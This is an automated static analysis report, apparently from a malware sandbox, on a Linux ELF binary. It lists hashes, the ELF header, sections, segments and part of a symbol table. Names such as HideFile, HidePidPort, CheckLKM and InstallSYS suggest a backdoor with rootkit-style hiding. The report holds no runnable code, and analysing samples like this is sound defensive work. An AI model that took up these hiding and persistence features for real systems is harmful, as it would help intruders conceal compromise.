Preview:	.ELF........................4....r......4. ...(......................a...a...............a...............r........................ ... ................a..............@...........Q.td........................................GNU.................U.....5..................1.^....PTRh Q..h`Q..QVh............U..S........[..,p..........t..~..X[.......U..S....=.....uT.0...-(.......X......9.v...&...............(........9.w......t...$.~................[]......U..............Z..o....t .T$..D$......D$.......$.~.......4.....t........t...$4.......U.....E..D$..E..D$..E...$.....E..D$..E...$...........U...(.E.....D$..E..D$...$.+...]....E..}..x..E....;E....E......?.E..E.....E..E..".E..E....</u..U.....E..........m...}..y.E..E.E...U...(.E.....D$..E..D$...$.+........E..}..x..E....;E....E........E..E.....E..E.E...U...(...............D$..D$.......$.P....E..D$..D$..+...D$.............$......E.....D$..E..D$.........$.<....E..}..x..E....;E...............E..E.....E...............U..W.....

Static File Info

General

File type:	ELF 32-bit LSB executable, Intel 80386, version 1 (SYSV), statically linked, for GNU/Linux 2.6.9, not stripped
Entropy (8bit):	6.2443817863410676
TrID:	ELF Executable and Linkable format (Linux) (4029/14) 50.16% ELF Executable and Linkable format (generic) (4004/1) 49.84%
File name:	dptxrnhxmx.elf
File size:	625'878 bytes
MD5:	85682d3effdb2d559fd84df491e9461a
SHA1:	2fb53f36a77339e1dd8458dd3fe561355de76211
SHA256:	3a8a11b60fd8e2f93d29fb46cdda68fd404b06147a7c717d3619b088e39875ba
SHA512:	f4cb94b160ed93d57b05d151c949c4dfd3a8b44d45af6d9432d2a9f1fafc02dec4e66d4f3cbdeeba16c769fc97b4f48a611aa92f653b1aa8f07b90d876168a86
SSDEEP:	12288:FBXOvdwV1/n/dQFhWlH/c1dHo4h9L+zNZrryT6yF8EEP4UlUuTh1Ae:FBXmkN/+Fhu/Qo4h9L+zNNyBVEBl/91f
TLSH:	F2D47D06F243EAF7C4970570124BF7BF4230E6318412DF8AB6889D5AB9379F52A4E356
File Content Preview:	.ELF........................4....r......4. ...(......................a...a...............a...............r.......................... ... ................a..............@...........Q.td........................................GNU.................U......5...

Static ELF Info

ELF header
Class:	ELF32
Data:	2's complement, little endian
Version:	1 (current)
Machine:	Intel 80386
Version Number:	0x1
Type:	EXEC (Executable file)
OS/ABI:	UNIX - System V
ABI Version:	0
Entry Point Address:	0x8048110
Flags:	0x0
ELF Header Size:	52
Program Header Offset:	52
Program Header Size:	32
Number of Program Headers:	5
Section Header Offset:	553480
Section Header Size:	40
Number of Section Headers:	28
Header String Table Index:	25

Sections

Name	Type	Address	Offset	Size	EntSize	Flags	Flags Description	Link	Info	Align
	NULL	0x0	0x0	0x0	0x0	0x0		0	0	0
.note.ABI-tag	NOTE	0x80480d4	0xd4	0x20	0x0	0x2	A	0	0	4
.init	PROGBITS	0x80480f4	0xf4	0x17	0x0	0x6	AX	0	0	4
.text	PROGBITS	0x8048110	0x110	0x697d8	0x0	0x6	AX	0	0	16
__libc_freeres_fn	PROGBITS	0x80b18f0	0x698f0	0x100f	0x0	0x6	AX	0	0	16
__libc_thread_freeres_fn	PROGBITS	0x80b2900	0x6a900	0x1db	0x0	0x6	AX	0	0	16
.fini	PROGBITS	0x80b2adc	0x6aadc	0x1c	0x0	0x6	AX	0	0	4
.rodata	PROGBITS	0x80b2b00	0x6ab00	0x153c0	0x0	0x2	A	0	0	32
__libc_subfreeres	PROGBITS	0x80c7ec0	0x7fec0	0x30	0x0	0x2	A	0	0	4
__libc_atexit	PROGBITS	0x80c7ef0	0x7fef0	0x4	0x0	0x2	A	0	0	4
__libc_thread_subfreeres	PROGBITS	0x80c7ef4	0x7fef4	0x8	0x0	0x2	A	0	0	4
.eh_frame	PROGBITS	0x80c7efc	0x7fefc	0x60f4	0x0	0x2	A	0	0	4
.gcc_except_table	PROGBITS	0x80cdff0	0x85ff0	0x11b	0x0	0x2	A	0	0	1
.tdata	PROGBITS	0x80cf10c	0x8610c	0x14	0x0	0x403	WAT	0	0	4
.tbss	NOBITS	0x80cf120	0x86120	0x2c	0x0	0x403	WAT	0	0	4
.ctors	PROGBITS	0x80cf120	0x86120	0x8	0x0	0x3	WA	0	0	4
.dtors	PROGBITS	0x80cf128	0x86128	0xc	0x0	0x3	WA	0	0	4
.jcr	PROGBITS	0x80cf134	0x86134	0x4	0x0	0x3	WA	0	0	4
.data.rel.ro	PROGBITS	0x80cf138	0x86138	0x2c	0x0	0x3	WA	0	0	4
.got	PROGBITS	0x80cf164	0x86164	0x8	0x4	0x3	WA	0	0	4
.got.plt	PROGBITS	0x80cf16c	0x8616c	0xc	0x4	0x3	WA	0	0	4
.data	PROGBITS	0x80cf180	0x86180	0xb40	0x0	0x3	WA	0	0	32
.bss	NOBITS	0x80cfcc0	0x86cc0	0x6718	0x0	0x3	WA	0	0	32
__libc_freeres_ptrs	NOBITS	0x80d63d8	0x86cc0	0x14	0x0	0x3	WA	0	0	4
.comment	PROGBITS	0x0	0x86cc0	0x422	0x0	0x0		0	0	1
.shstrtab	STRTAB	0x0	0x870e2	0x126	0x0	0x0		0	0	1
.symtab	SYMTAB	0x0	0x87668	0x93c0	0x10	0x0		27	914	4
.strtab	STRTAB	0x0	0x90a28	0x82a3	0x0	0x0		0	0	1

Program Segments

Type	Offset	Virtual Address	Physical Address	File Size	Memory Size	Entropy	Flags	Flags Description	Align	Section Mappings
LOAD	0x0	0x8048000	0x8048000	0x8610b	0x8610b	6.1965	0x5	R E	0x1000	.note.ABI-tag .init .text __libc_freeres_fn __libc_thread_freeres_fn .fini .rodata __libc_subfreeres __libc_atexit __libc_thread_subfreeres .eh_frame .gcc_except_table
LOAD	0x8610c	0x80cf10c	0x80cf10c	0xbb4	0x72e0	3.6572	0x6	RW	0x1000	.tdata .tbss .ctors .dtors .jcr .data.rel.ro .got .got.plt .data .bss __libc_freeres_ptrs
NOTE	0xd4	0x80480d4	0x80480d4	0x20	0x20	1.7487	0x4	R	0x4	.note.ABI-tag
TLS	0x8610c	0x80cf10c	0x80cf10c	0x14	0x40	2.8414	0x4	R	0x4	.tdata .tbss
GNU_STACK	0x0	0x0	0x0	0x0	0x0	0.0000	0x6	RW	0x4

Symbols

Name	Section Name	Value	Size	Symbol Type	Symbol Bind	Symbol Visibility	Ndx
	.symtab	0x0	0	NOTYPE	<unknown>	DEFAULT	SHN_UNDEF
	.symtab	0x80480d4	0	SECTION	<unknown>	DEFAULT	1
	.symtab	0x80480f4	0	SECTION	<unknown>	DEFAULT	2
	.symtab	0x8048110	0	SECTION	<unknown>	DEFAULT	3
	.symtab	0x80b18f0	0	SECTION	<unknown>	DEFAULT	4
	.symtab	0x80b2900	0	SECTION	<unknown>	DEFAULT	5
	.symtab	0x80b2adc	0	SECTION	<unknown>	DEFAULT	6
	.symtab	0x80b2b00	0	SECTION	<unknown>	DEFAULT	7
	.symtab	0x80c7ec0	0	SECTION	<unknown>	DEFAULT	8
	.symtab	0x80c7ef0	0	SECTION	<unknown>	DEFAULT	9
	.symtab	0x80c7ef4	0	SECTION	<unknown>	DEFAULT	10
	.symtab	0x80c7efc	0	SECTION	<unknown>	DEFAULT	11
	.symtab	0x80cdff0	0	SECTION	<unknown>	DEFAULT	12
	.symtab	0x80cf10c	0	SECTION	<unknown>	DEFAULT	13
	.symtab	0x80cf120	0	SECTION	<unknown>	DEFAULT	14
	.symtab	0x80cf120	0	SECTION	<unknown>	DEFAULT	15
	.symtab	0x80cf128	0	SECTION	<unknown>	DEFAULT	16
	.symtab	0x80cf134	0	SECTION	<unknown>	DEFAULT	17
	.symtab	0x80cf138	0	SECTION	<unknown>	DEFAULT	18
	.symtab	0x80cf164	0	SECTION	<unknown>	DEFAULT	19
	.symtab	0x80cf16c	0	SECTION	<unknown>	DEFAULT	20
	.symtab	0x80cf180	0	SECTION	<unknown>	DEFAULT	21
	.symtab	0x80cfcc0	0	SECTION	<unknown>	DEFAULT	22
	.symtab	0x80d63d8	0	SECTION	<unknown>	DEFAULT	23
	.symtab	0x0	0	SECTION	<unknown>	DEFAULT	24
.L108	.symtab	0x80ad950	0	NOTYPE	<unknown>	DEFAULT	3
.L113	.symtab	0x80ad990	0	NOTYPE	<unknown>	DEFAULT	3
.L114	.symtab	0x80ad9f8	0	NOTYPE	<unknown>	DEFAULT	3
.L115	.symtab	0x80ada30	0	NOTYPE	<unknown>	DEFAULT	3
.L116	.symtab	0x80ada4e	0	NOTYPE	<unknown>	DEFAULT	3
.L117	.symtab	0x80ada6c	0	NOTYPE	<unknown>	DEFAULT	3
.L118	.symtab	0x80ada89	0	NOTYPE	<unknown>	DEFAULT	3
.L119	.symtab	0x80adabd	0	NOTYPE	<unknown>	DEFAULT	3
.L12	.symtab	0x80b130b	0	NOTYPE	<unknown>	DEFAULT	3
.L120	.symtab	0x80adadc	0	NOTYPE	<unknown>	DEFAULT	3
.L121	.symtab	0x80adafb	0	NOTYPE	<unknown>	DEFAULT	3
.L122	.symtab	0x80ad8e3	0	NOTYPE	<unknown>	DEFAULT	3
.L123	.symtab	0x80adb2b	0	NOTYPE	<unknown>	DEFAULT	3
.L124	.symtab	0x80add7f	0	NOTYPE	<unknown>	DEFAULT	3
.L125	.symtab	0x80addb4	0	NOTYPE	<unknown>	DEFAULT	3
.L126	.symtab	0x80add02	0	NOTYPE	<unknown>	DEFAULT	3
.L127	.symtab	0x80add1f	0	NOTYPE	<unknown>	DEFAULT	3
.L128	.symtab	0x80add46	0	NOTYPE	<unknown>	DEFAULT	3
.L129	.symtab	0x80add63	0	NOTYPE	<unknown>	DEFAULT	3
.L130	.symtab	0x80adb8c	0	NOTYPE	<unknown>	DEFAULT	3
.L131	.symtab	0x80adbd3	0	NOTYPE	<unknown>	DEFAULT	3
.L132	.symtab	0x80adc00	0	NOTYPE	<unknown>	DEFAULT	3
.L133	.symtab	0x80adc37	0	NOTYPE	<unknown>	DEFAULT	3
.L134	.symtab	0x80adc50	0	NOTYPE	<unknown>	DEFAULT	3
.L135	.symtab	0x80adc7d	0	NOTYPE	<unknown>	DEFAULT	3
.L136	.symtab	0x80adcb5	0	NOTYPE	<unknown>	DEFAULT	3
.L137	.symtab	0x80adcc9	0	NOTYPE	<unknown>	DEFAULT	3
.L14	.symtab	0x80b1419	0	NOTYPE	<unknown>	DEFAULT	3
.L15	.symtab	0x80b1408	0	NOTYPE	<unknown>	DEFAULT	3
.L16	.symtab	0x80b13f8	0	NOTYPE	<unknown>	DEFAULT	3
.L17	.symtab	0x80b13e8	0	NOTYPE	<unknown>	DEFAULT	3
.L18	.symtab	0x80b138c	0	NOTYPE	<unknown>	DEFAULT	3
.L19	.symtab	0x80b137e	0	NOTYPE	<unknown>	DEFAULT	3
.L20	.symtab	0x80b1345	0	NOTYPE	<unknown>	DEFAULT	3
.L21	.symtab	0x80b1371	0	NOTYPE	<unknown>	DEFAULT	3
.L258	.symtab	0x80ae76c	0	NOTYPE	<unknown>	DEFAULT	3
.L259	.symtab	0x80ae4a0	0	NOTYPE	<unknown>	DEFAULT	3
.L260	.symtab	0x80ae5f7	0	NOTYPE	<unknown>	DEFAULT	3
.L261	.symtab	0x80ae7c0	0	NOTYPE	<unknown>	DEFAULT	3
.L262	.symtab	0x80ae5e9	0	NOTYPE	<unknown>	DEFAULT	3
.L264	.symtab	0x80ae43d	0	NOTYPE	<unknown>	DEFAULT	3
.L266	.symtab	0x80ae496	0	NOTYPE	<unknown>	DEFAULT	3
.L267	.symtab	0x80ae68f	0	NOTYPE	<unknown>	DEFAULT	3
.L268	.symtab	0x80ae6a0	0	NOTYPE	<unknown>	DEFAULT	3
.L269	.symtab	0x80ae605	0	NOTYPE	<unknown>	DEFAULT	3
.L270	.symtab	0x80ae628	0	NOTYPE	<unknown>	DEFAULT	3
.L271	.symtab	0x80ae642	0	NOTYPE	<unknown>	DEFAULT	3
.L272	.symtab	0x80ae664	0	NOTYPE	<unknown>	DEFAULT	3
.L273	.symtab	0x80ae4ab	0	NOTYPE	<unknown>	DEFAULT	3
.L274	.symtab	0x80ae4e4	0	NOTYPE	<unknown>	DEFAULT	3
.L275	.symtab	0x80ae599	0	NOTYPE	<unknown>	DEFAULT	3
.L276	.symtab	0x80ae55f	0	NOTYPE	<unknown>	DEFAULT	3
.L277	.symtab	0x80ae5da	0	NOTYPE	<unknown>	DEFAULT	3
.L278	.symtab	0x80ae835	0	NOTYPE	<unknown>	DEFAULT	3
.L279	.symtab	0x80ae7ce	0	NOTYPE	<unknown>	DEFAULT	3
.L280	.symtab	0x80ae7e0	0	NOTYPE	<unknown>	DEFAULT	3
.L281	.symtab	0x80ae6b7	0	NOTYPE	<unknown>	DEFAULT	3
.L282	.symtab	0x80ae70c	0	NOTYPE	<unknown>	DEFAULT	3
.L283	.symtab	0x80ae467	0	NOTYPE	<unknown>	DEFAULT	3
.L350	.symtab	0x80ae840	0	NOTYPE	<unknown>	DEFAULT	3
.L351	.symtab	0x80ae84a	0	NOTYPE	<unknown>	DEFAULT	3
.L352	.symtab	0x80ae859	0	NOTYPE	<unknown>	DEFAULT	3
.L353	.symtab	0x80ae863	0	NOTYPE	<unknown>	DEFAULT	3
.L354	.symtab	0x80ae872	0	NOTYPE	<unknown>	DEFAULT	3
.L355	.symtab	0x80ae87d	0	NOTYPE	<unknown>	DEFAULT	3
.L356	.symtab	0x80ae887	0	NOTYPE	<unknown>	DEFAULT	3
.L357	.symtab	0x80ae892	0	NOTYPE	<unknown>	DEFAULT	3
.L358	.symtab	0x80ae89e	0	NOTYPE	<unknown>	DEFAULT	3
.L359	.symtab	0x80ae8aa	0	NOTYPE	<unknown>	DEFAULT	3
.L360	.symtab	0x80ae8b3	0	NOTYPE	<unknown>	DEFAULT	3
.L361	.symtab	0x80ae8bd	0	NOTYPE	<unknown>	DEFAULT	3
.L362	.symtab	0x80ae8cc	0	NOTYPE	<unknown>	DEFAULT	3
.L363	.symtab	0x80ae8db	0	NOTYPE	<unknown>	DEFAULT	3
.L364	.symtab	0x80ae8ea	0	NOTYPE	<unknown>	DEFAULT	3
.L365	.symtab	0x80ae8f9	0	NOTYPE	<unknown>	DEFAULT	3
.L366	.symtab	0x80ae908	0	NOTYPE	<unknown>	DEFAULT	3
.L380	.symtab	0x80ae438	0	NOTYPE	<unknown>	DEFAULT	3
.L411	.symtab	0x80aeb10	0	NOTYPE	<unknown>	DEFAULT	3
.L412	.symtab	0x80aeae6	0	NOTYPE	<unknown>	DEFAULT	3
.L413	.symtab	0x80aeb54	0	NOTYPE	<unknown>	DEFAULT	3
.L414	.symtab	0x80aebc0	0	NOTYPE	<unknown>	DEFAULT	3
.L415	.symtab	0x80aec20	0	NOTYPE	<unknown>	DEFAULT	3
.L416	.symtab	0x80aec60	0	NOTYPE	<unknown>	DEFAULT	3
.L61	.symtab	0x80ad673	0	NOTYPE	<unknown>	DEFAULT	3
.L63	.symtab	0x80ad6ef	0	NOTYPE	<unknown>	DEFAULT	3
.L64	.symtab	0x80ad6ce	0	NOTYPE	<unknown>	DEFAULT	3
.L67	.symtab	0x80ad6de	0	NOTYPE	<unknown>	DEFAULT	3
.L68	.symtab	0x80ad6d6	0	NOTYPE	<unknown>	DEFAULT	3
.L69	.symtab	0x80ad6a2	0	NOTYPE	<unknown>	DEFAULT	3
.L70	.symtab	0x80ad6c2	0	NOTYPE	<unknown>	DEFAULT	3
.L74	.symtab	0x80afb63	0	NOTYPE	<unknown>	DEFAULT	3
.L76	.symtab	0x80afbdf	0	NOTYPE	<unknown>	DEFAULT	3
.L77	.symtab	0x80afbbe	0	NOTYPE	<unknown>	DEFAULT	3
.L80	.symtab	0x80afbce	0	NOTYPE	<unknown>	DEFAULT	3
.L81	.symtab	0x80afbc6	0	NOTYPE	<unknown>	DEFAULT	3
.L82	.symtab	0x80afb92	0	NOTYPE	<unknown>	DEFAULT	3
.L83	.symtab	0x80afbb2	0	NOTYPE	<unknown>	DEFAULT	3
AddService	.symtab	0x8048865	807	FUNC	<unknown>	DEFAULT	3
CalcCrc32	.symtab	0x80492b4	70	FUNC	<unknown>	DEFAULT	3
CalcFileCrc	.symtab	0x8049346	172	FUNC	<unknown>	DEFAULT	3
CalcFindIpCrc	.symtab	0x8049320	38	FUNC	<unknown>	DEFAULT	3
CalcHeaderCrc	.symtab	0x80492fa	38	FUNC	<unknown>	DEFAULT	3
CheckLKM	.symtab	0x804a670	107	FUNC	<unknown>	DEFAULT	3
CreateDir	.symtab	0x80483de	375	FUNC	<unknown>	DEFAULT	3
DNS_ADDR	.symtab	0x80cf4cc	16	OBJECT	<unknown>	DEFAULT	21
DNS_ADDR2	.symtab	0x80cf4dc	16	OBJECT	<unknown>	DEFAULT	21
DNS_PORT	.symtab	0x80cf4ec	4	OBJECT	<unknown>	DEFAULT	21
DelService	.symtab	0x8048cdc	275	FUNC	<unknown>	DEFAULT	3
DelService_form_pid	.symtab	0x8048def	113	FUNC	<unknown>	DEFAULT	3
GetCpuInfo	.symtab	0x804e2ce	539	FUNC	<unknown>	DEFAULT	3
GetIndex	.symtab	0x804b418	189	FUNC	<unknown>	DEFAULT	3
GetLanSpeed	.symtab	0x804e5e1	243	FUNC	<unknown>	DEFAULT	3
GetMemStat	.symtab	0x804e1d9	245	FUNC	<unknown>	DEFAULT	3
Get_AllIP	.symtab	0x804ef5d	375	FUNC	<unknown>	DEFAULT	3
HideFile	.symtab	0x804a74d	151	FUNC	<unknown>	DEFAULT	3
HidePidPort	.symtab	0x804a6db	114	FUNC	<unknown>	DEFAULT	3
InstallSYS	.symtab	0x8048b8c	336	FUNC	<unknown>	DEFAULT	3
LinuxExec	.symtab	0x8048eed	122	FUNC	<unknown>	DEFAULT	3
LinuxExec_Argv	.symtab	0x8048f67	135	FUNC	<unknown>	DEFAULT	3
LinuxExec_Argv2	.symtab	0x8048fee	148	FUNC	<unknown>	DEFAULT	3
LogFacility	.symtab	0x80cfa0c	4	OBJECT	<unknown>	DEFAULT	21
LogFile	.symtab	0x80cfa08	4	OBJECT	<unknown>	DEFAULT	21
LogMask	.symtab	0x80cfa00	4	OBJECT	<unknown>	DEFAULT	21
LogStat	.symtab	0x80d5044	4	OBJECT	<unknown>	DEFAULT	22
LogTag	.symtab	0x80d5048	4	OBJECT	<unknown>	DEFAULT	22
LogType	.symtab	0x80cfa04	4	OBJECT	<unknown>	DEFAULT	21
MAGIC_STR	.symtab	0x80d1f60	33	OBJECT	<unknown>	DEFAULT	22
MainList	.symtab	0x80d1fa0	264	OBJECT	<unknown>	DEFAULT	22
ReadWord	.symtab	0x804e150	137	FUNC	<unknown>	DEFAULT	3
SIZE_DNS_H	.symtab	0x80cf4a4	4	OBJECT	<unknown>	DEFAULT	21
SIZE_DNS_T	.symtab	0x80cf4a8	4	OBJECT	<unknown>	DEFAULT	21
SIZE_IP_H	.symtab	0x80cf498	4	OBJECT	<unknown>	DEFAULT	21
SIZE_PSEUDO_HDR	.symtab	0x80cf4ac	4	OBJECT	<unknown>	DEFAULT	21
SIZE_TCP_H	.symtab	0x80cf4a0	4	OBJECT	<unknown>	DEFAULT	21
SIZE_UDP_H	.symtab	0x80cf49c	4	OBJECT	<unknown>	DEFAULT	21
SYS_BUF	.symtab	0x80cfce0	1	OBJECT	<unknown>	DEFAULT	22
SyslogAddr	.symtab	0x80d5060	110	OBJECT	<unknown>	DEFAULT	22
THREAD_NUM	.symtab	0x80d6170	4	OBJECT	<unknown>	DEFAULT	22
_Exit	.symtab	0x8067a28	19	FUNC	<unknown>	DEFAULT	3
_GLOBAL_OFFSET_TABLE_	.symtab	0x80cf16c	0	OBJECT	<unknown>	HIDDEN	20
_IO_2_1_stderr_	.symtab	0x80cf700	152	OBJECT	<unknown>	DEFAULT	21
_IO_2_1_stdin_	.symtab	0x80cf5c0	152	OBJECT	<unknown>	DEFAULT	21
_IO_2_1_stdout_	.symtab	0x80cf660	152	OBJECT	<unknown>	DEFAULT	21
_IO_adjust_column	.symtab	0x805c9b0	60	FUNC	<unknown>	DEFAULT	3
_IO_adjust_wcolumn	.symtab	0x8084770	63	FUNC	<unknown>	DEFAULT	3
_IO_cleanup	.symtab	0x805d310	409	FUNC	<unknown>	DEFAULT	3
_IO_default_doallocate	.symtab	0x805de10	143	FUNC	<unknown>	DEFAULT	3
_IO_default_finish	.symtab	0x805e310	525	FUNC	<unknown>	DEFAULT	3
_IO_default_imbue	.symtab	0x805cac0	5	FUNC	<unknown>	DEFAULT	3
_IO_default_pbackfail	.symtab	0x805d900	310	FUNC	<unknown>	DEFAULT	3
_IO_default_read	.symtab	0x805ca90	10	FUNC	<unknown>	DEFAULT	3
_IO_default_seek	.symtab	0x805ca70	15	FUNC	<unknown>	DEFAULT	3
_IO_default_seekoff	.symtab	0x805c900	15	FUNC	<unknown>	DEFAULT	3
_IO_default_seekpos	.symtab	0x805c810	59	FUNC	<unknown>	DEFAULT	3
_IO_default_setbuf	.symtab	0x805dd10	244	FUNC	<unknown>	DEFAULT	3
_IO_default_showmanyc	.symtab	0x805cab0	10	FUNC	<unknown>	DEFAULT	3
_IO_default_stat	.symtab	0x805ca80	10	FUNC	<unknown>	DEFAULT	3
_IO_default_sync	.symtab	0x805c8f0	7	FUNC	<unknown>	DEFAULT	3
_IO_default_uflow	.symtab	0x805c7b0	52	FUNC	<unknown>	DEFAULT	3
_IO_default_underflow	.symtab	0x805c7a0	10	FUNC	<unknown>	DEFAULT	3
_IO_default_write	.symtab	0x805caa0	7	FUNC	<unknown>	DEFAULT	3
_IO_default_xsgetn	.symtab	0x805e250	185	FUNC	<unknown>	DEFAULT	3
_IO_default_xsputn	.symtab	0x805cc80	225	FUNC	<unknown>	DEFAULT	3
_IO_do_write	.symtab	0x805bd80	271	FUNC	<unknown>	DEFAULT	3
_IO_doallocbuf	.symtab	0x805dc80	133	FUNC	<unknown>	DEFAULT	3
_IO_fclose	.symtab	0x8057df0	439	FUNC	<unknown>	DEFAULT	3
_IO_feof	.symtab	0x80596d0	154	FUNC	<unknown>	DEFAULT	3
_IO_fgets	.symtab	0x8057ff0	360	FUNC	<unknown>	DEFAULT	3
_IO_file_attach	.symtab	0x8059dc0	133	FUNC	<unknown>	DEFAULT	3
_IO_file_close	.symtab	0x805a940	18	FUNC	<unknown>	DEFAULT	3
_IO_file_close_it	.symtab	0x805b2f0	581	FUNC	<unknown>	DEFAULT	3
_IO_file_close_mmap	.symtab	0x805a960	60	FUNC	<unknown>	DEFAULT	3
_IO_file_doallocate	.symtab	0x80839b0	275	FUNC	<unknown>	DEFAULT	3
_IO_file_finish	.symtab	0x805c4a0	327	FUNC	<unknown>	DEFAULT	3
_IO_file_fopen	.symtab	0x805b540	1388	FUNC	<unknown>	DEFAULT	3
_IO_file_init	.symtab	0x805b040	51	FUNC	<unknown>	DEFAULT	3
_IO_file_jumps	.symtab	0x80b3e00	84	OBJECT	<unknown>	DEFAULT	7
_IO_file_jumps_maybe_mmap	.symtab	0x80b3ec0	84	OBJECT	<unknown>	DEFAULT	7
_IO_file_jumps_mmap	.symtab	0x80b3e60	84	OBJECT	<unknown>	DEFAULT	7
_IO_file_open	.symtab	0x805af30	263	FUNC	<unknown>	DEFAULT	3
_IO_file_overflow	.symtab	0x805c030	1131	FUNC	<unknown>	DEFAULT	3
_IO_file_read	.symtab	0x805a9d0	48	FUNC	<unknown>	DEFAULT	3
_IO_file_seek	.symtab	0x8059fd0	18	FUNC	<unknown>	DEFAULT	3
_IO_file_seekoff	.symtab	0x805aa00	1245	FUNC	<unknown>	DEFAULT	3
_IO_file_seekoff_maybe_mmap	.symtab	0x8059f80	80	FUNC	<unknown>	DEFAULT	3
_IO_file_seekoff_mmap	.symtab	0x8059e50	297	FUNC	<unknown>	DEFAULT	3
_IO_file_setbuf	.symtab	0x805aee0	75	FUNC	<unknown>	DEFAULT	3
_IO_file_setbuf_mmap	.symtab	0x805b270	115	FUNC	<unknown>	DEFAULT	3
_IO_file_stat	.symtab	0x805a9a0	37	FUNC	<unknown>	DEFAULT	3
_IO_file_sync	.symtab	0x805be90	406	FUNC	<unknown>	DEFAULT	3
_IO_file_sync_mmap	.symtab	0x8059ff0	165	FUNC	<unknown>	DEFAULT	3
_IO_file_underflow	.symtab	0x805b080	495	FUNC	<unknown>	DEFAULT	3
_IO_file_underflow_maybe_mmap	.symtab	0x805a2e0	30	FUNC	<unknown>	DEFAULT	3
_IO_file_underflow_mmap	.symtab	0x805a6b0	66	FUNC	<unknown>	DEFAULT	3
_IO_file_write	.symtab	0x805a890	166	FUNC	<unknown>	DEFAULT	3
_IO_file_xsgetn	.symtab	0x805a700	394	FUNC	<unknown>	DEFAULT	3
_IO_file_xsgetn_maybe_mmap	.symtab	0x805a290	67	FUNC	<unknown>	DEFAULT	3
_IO_file_xsgetn_mmap	.symtab	0x805a5b0	242	FUNC	<unknown>	DEFAULT	3
_IO_file_xsputn	.symtab	0x805bab0	705	FUNC	<unknown>	DEFAULT	3
_IO_flush_all	.symtab	0x805d4b0	20	FUNC	<unknown>	DEFAULT	3
_IO_flush_all_linebuffered	.symtab	0x805cf30	448	FUNC	<unknown>	DEFAULT	3
_IO_flush_all_lockp	.symtab	0x805d0f0	533	FUNC	<unknown>	DEFAULT	3
_IO_fopen	.symtab	0x80582a0	34	FUNC	<unknown>	DEFAULT	3
_IO_fprintf	.symtab	0x8083330	36	FUNC	<unknown>	DEFAULT	3
_IO_free_backup_area	.symtab	0x805cc20	93	FUNC	<unknown>	DEFAULT	3
_IO_free_wbackup_area	.symtab	0x80847f0	104	FUNC	<unknown>	DEFAULT	3
_IO_ftell	.symtab	0x8083ad0	436	FUNC	<unknown>	DEFAULT	3
_IO_funlockfile	.symtab	0x80833c0	47	FUNC	<unknown>	DEFAULT	3
_IO_fwide	.symtab	0x8085950	323	FUNC	<unknown>	DEFAULT	3
_IO_fwrite	.symtab	0x8083d60	297	FUNC	<unknown>	DEFAULT	3
_IO_getc	.symtab	0x8059880	207	FUNC	<unknown>	DEFAULT	3
_IO_getdelim	.symtab	0x8083eb0	624	FUNC	<unknown>	DEFAULT	3
_IO_getline	.symtab	0x8058440	55	FUNC	<unknown>	DEFAULT	3
_IO_getline_info	.symtab	0x80582d0	353	FUNC	<unknown>	DEFAULT	3
_IO_helper_jumps	.symtab	0x80c2a40	84	OBJECT	<unknown>	DEFAULT	7
_IO_helper_overflow	.symtab	0x8079fc0	175	FUNC	<unknown>	DEFAULT	3
_IO_init	.symtab	0x805db50	163	FUNC	<unknown>	DEFAULT	3
_IO_init_marker	.symtab	0x805dea0	169	FUNC	<unknown>	DEFAULT	3
_IO_init_wmarker	.symtab	0x80850e0	193	FUNC	<unknown>	DEFAULT	3
_IO_iter_begin	.symtab	0x805cad0	10	FUNC	<unknown>	DEFAULT	3
_IO_iter_end	.symtab	0x805cae0	7	FUNC	<unknown>	DEFAULT	3
_IO_iter_file	.symtab	0x805cb00	8	FUNC	<unknown>	DEFAULT	3
_IO_iter_next	.symtab	0x805caf0	11	FUNC	<unknown>	DEFAULT	3
_IO_least_marker	.symtab	0x805c690	38	FUNC	<unknown>	DEFAULT	3
_IO_least_wmarker	.symtab	0x8084570	51	FUNC	<unknown>	DEFAULT	3
_IO_link_in	.symtab	0x805d4d0	400	FUNC	<unknown>	DEFAULT	3
_IO_list_all	.symtab	0x80cf798	4	OBJECT	<unknown>	DEFAULT	21
_IO_list_all_stamp	.symtab	0x80d4b00	4	OBJECT	<unknown>	DEFAULT	22
_IO_list_lock	.symtab	0x805cb10	64	FUNC	<unknown>	DEFAULT	3
_IO_list_resetlock	.symtab	0x805cb90	35	FUNC	<unknown>	DEFAULT	3
_IO_list_unlock	.symtab	0x805cb50	56	FUNC	<unknown>	DEFAULT	3
_IO_marker_delta	.symtab	0x805ca40	47	FUNC	<unknown>	DEFAULT	3
_IO_marker_difference	.symtab	0x805ca20	17	FUNC	<unknown>	DEFAULT	3
_IO_mem_finish	.symtab	0x8085bb0	106	FUNC	<unknown>	DEFAULT	3
_IO_mem_jumps	.symtab	0x80c2ea0	84	OBJECT	<unknown>	DEFAULT	7
_IO_mem_sync	.symtab	0x8085b60	76	FUNC	<unknown>	DEFAULT	3
_IO_new_do_write	.symtab	0x805bd80	271	FUNC	<unknown>	DEFAULT	3
_IO_new_fclose	.symtab	0x8057df0	439	FUNC	<unknown>	DEFAULT	3
_IO_new_file_attach	.symtab	0x8059dc0	133	FUNC	<unknown>	DEFAULT	3
_IO_new_file_close_it	.symtab	0x805b2f0	581	FUNC	<unknown>	DEFAULT	3
_IO_new_file_finish	.symtab	0x805c4a0	327	FUNC	<unknown>	DEFAULT	3
_IO_new_file_fopen	.symtab	0x805b540	1388	FUNC	<unknown>	DEFAULT	3
_IO_new_file_init	.symtab	0x805b040	51	FUNC	<unknown>	DEFAULT	3
_IO_new_file_overflow	.symtab	0x805c030	1131	FUNC	<unknown>	DEFAULT	3
_IO_new_file_seekoff	.symtab	0x805aa00	1245	FUNC	<unknown>	DEFAULT	3
_IO_new_file_setbuf	.symtab	0x805aee0	75	FUNC	<unknown>	DEFAULT	3
_IO_new_file_sync	.symtab	0x805be90	406	FUNC	<unknown>	DEFAULT	3
_IO_new_file_underflow	.symtab	0x805b080	495	FUNC	<unknown>	DEFAULT	3
_IO_new_file_write	.symtab	0x805a890	166	FUNC	<unknown>	DEFAULT	3
_IO_new_file_xsputn	.symtab	0x805bab0	705	FUNC	<unknown>	DEFAULT	3
_IO_new_fopen	.symtab	0x80582a0	34	FUNC	<unknown>	DEFAULT	3
_IO_no_init	.symtab	0x805da40	259	FUNC	<unknown>	DEFAULT	3
_IO_old_init	.symtab	0x805c850	150	FUNC	<unknown>	DEFAULT	3
_IO_padn	.symtab	0x8084150	203	FUNC	<unknown>	DEFAULT	3
_IO_remove_marker	.symtab	0x805c9f0	40	FUNC	<unknown>	DEFAULT	3
_IO_seekmark	.symtab	0x805d840	179	FUNC	<unknown>	DEFAULT	3
